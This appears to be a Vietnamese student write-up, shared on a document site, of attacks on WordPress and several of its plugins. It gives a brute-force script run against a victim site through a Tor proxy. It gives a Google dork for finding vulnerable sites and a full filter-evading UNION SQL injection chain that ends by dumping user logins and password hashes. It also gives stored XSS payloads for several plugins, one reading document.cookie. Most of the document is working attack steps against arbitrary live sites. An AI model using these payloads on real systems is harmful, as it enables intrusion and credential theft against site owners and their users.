13
1. Wordpress Brute Force: a. Mô t: b. Phn mm bảnh hưởng: c. Demo: https://www.youtube.com/watch?v=yzHyfJiM4a4 d. Step by step 1. python wpbrute.py 2. python wpbrute.py [WEB VICTIM] [USER] [FILE_PASSWORD_DATABASE] ‘127.0.0.1:9050’ 3. Admin Password đã tìm ra được

Loi baomat wordpress

Embed Size (px)

Citation preview

1. Wordpress Brute Force:

a. Mô tả:

b. Phần mềm bị ảnh hưởng:

c. Demo: https://www.youtube.com/watch?v=yzHyfJiM4a4

d. Step by step

1. python wpbrute.py

2. python wpbrute.py [WEB VICTIM]

[USER] [FILE_PASSWORD_DATABASE] ‘127.0.0.1:9050’

3. Admin Password đã tìm ra được

2. Wordpress All Version career details Sql Injection:

a. Mô tả:

b. Phần mềm bị ảnh hưởng:

c. Demo: http://pastebin.com/2tQpHzXx

https://www.youtube.com/watch?v=0qwBXPUOe1A

d. Step by step

4. Search Google với từ khóa

inurl:/career-details/?jobid=

5. Sau đó chọn 1 trang bất kì để test

6. Kiểm tra xem trang này có bị lỗi SQL

injection không bằng cách thêm 1 dấu nháy tại vị trí sau cùng của đường link

7. Xuất hiện lỗi chứng tỏ trang này có thể khai thác SQL injection Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mappstra/public_html/wp-content/plugins/easy-career-openings/includes/shortcodes/posting_details.php on line 5

8. Thay dấu nháy vừa thêm bằng thành phần sau +order+by+?--

9. Lần lượt thay dấu ? trong thành phần trên bằng các số tự nhiên đến khi thấy lỗi.

10. trong trang này tôi thay số 5 vẫn còn

lỗi, nhưng thay số 4 là hết lỗi

11. Thay thành phần +order+by+?--

bằng +/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4--

12. Thay thành phần +/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4-- bằng +/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/-- ( Hiển thị tất cả database )

13. Thay thành phần

+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/

/*!12345INFORMATION_SCHEMa.SCHEMATA*/-- bằng +/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/-- ( Hiển thị database của website )

14. Thay thành phần +/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/-- bằng +/*!12345UNION*/+/*!12345SELECT*/

1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()-- ( Hiển thị các table trong database của website, chúng ta quan tâm đến table chứa thông tin user: wpnew_users )

15. dùng trang http://www.branah.com/ascii-converter để chuyển chữ “wpnew_users” sang dạng thập phân “119 112 110 101 119 95 117 115 101 114 115”

16. Thay thành phần

+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/

/*!12345table_schema*/ =database()--bằng +/*!12345UNION*/+/*!12345SELECT*/ 1,2,unhex(hex(/*!12345GrOUp_COnCaT(column_name)*/)),4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 110, 101, 119, 95 ,117, 115, 101 ,114 ,115)-- ( Hiển thị các cột trong table wpnew_users )

17. Thay thành phần +/*!12345UNION*/+/*!12345SELECT*/ 1,2,unhex(hex(/*!12345GrOUp_COnCaT(column_name)*/)),4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 110, 101, 119, 95 ,117, 115, 101 ,114 ,115)--

bằng +/*!12345UNION*/+/*!12345SELECT*/

1,2,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),4 /*!12345from*/ wpnew_users-- ( Hiển thị các dòng trong table wpnew_users )

3. Quick Contact Form Plugin - XSS Vulnerability:

a. Mô tả:

Lỗ hổng do thiếu kiểm tra tính hợp lệ phần input.

b. Phần mềm bị ảnh hưởng:

Từ 6.0 trở về trước

c. Demo: http://www.exploit-db.com/exploits/28808/

d. Step by step

1. Mục Your Name nhập vào: <script>alert(String.fromCharCode

(72,101,108,108,111,76,117,97,110,86

,97,110))</script>

Các mục khác tùy ý. 2. Nhấp nút SEND IT!

3. Đăng nhập vào trang admin 4. Vào mục Messenges default 5. Mã chèn được thực thi

4. Usernoise Plugin - XSS Vulnerability:

a. Mô tả:

Lỗ hổng do thiếu kiểm tra tính hợp lệ phần input. Chấp nhận cả javascript …

b. Phần mềm bị ảnh hưởng:

Từ 3.7.8 trở về trước

c. Demo: http://www.exploit-db.com/exploits/27403/

1. Mục Short summary nhập vào: <script>alert(String.fromCharCode

(72,101,108,108,111,76,117,97,110,86

,97,110))</script>

Các mục khác tùy ý. 2. Nhấp nút Submit feedback

3. Đăng nhập vào trang admin

4. Nhấp vào mục Dashboard

5. Mã chèn được thực thi

5. Count per Day Plugin - XSS Vulnerability:

a. Mô tả:

Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc biệt bằng cách

sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một thông báo e-mail.

b. Phần mềm bị ảnh hưởng:

3.2.3

c. Demo: http://www.exploit-db.com/exploits/20862/

d. Step by step

1. Truy cập vào đường dẫn http://WP-path/wp-content/plugins/count-per-day/notes.php

2. Mục Notes nhập vào: <script>alert(String.fromCharCode

(72,101,108,108,111,76,117,97,110,86

,97,110))</script>

3. Nhấp nút ‘+’ 4. Đăng nhập vào trang admin

5. Nhấp vào mục Dashboard Count

per day

6. Mã chèn được thực thi

6. Relevanssi Plugin - XSS Vulnerability:

a. Mô tả:

b. Phần mềm bị ảnh hưởng:

2.7.2

c. Demo: http://www.exploit-db.com/exploits/16233/

d. Step by step

1. Nhập vào khung Search nội dung như sau:

<script>alert('Hello Luan van');</script> 2. Nhấn Enter để Search

3. Đăng nhập vào trang admin

4. Nhấp vào mục Dashboard User

searches

5. Mã chèn được thực thi

7. Wordpress Download Manager Free & Pro - XSS Vulnerability:

a. Mô tả:

b. Phần mềm bị ảnh hưởng:

2.6.0

c. Demo: http://www.exploit-db.com/exploits/30105/

d. Step by step

1. Đăng nhập với tài khoản user thường

2. Vào mục File Manager Add New 3. Phần Enter Title Here nhập

test <input onmouseover=prompt(document.cookie)>

4. Nhấp nút Create Package 5. Nhấp nút Update Package

6. Khi Admin đăng nhập vào xem

mục File Manager và di chuyển chuột lên vùng sau chữ “test” thì mã độc được chèn thêm sẽ được thực thi.

8. YOP Poll - XSS Vulnerability:

a. Mô tả:

b. Phần mềm bị ảnh hưởng:

4.6

c. Demo: http://www.nerdbox.it/wordpress-yop-poll-xss/

d. Step by step:

1. Trong trang quản lý của Admin 2. Vào mục Yop Poll Add New 3. Mục Poll Nam nhập vào :

Test <input onmouseover= "alert(String.fromCharCode (72,101,108,108,111,76,117,97,110,86 ,97,110))">

4. Nhấp nút Save Poll

5. Khi Guest di chuyển chuột trên

khung nhập liệu thì mã độc được chèn sẽ thực thi.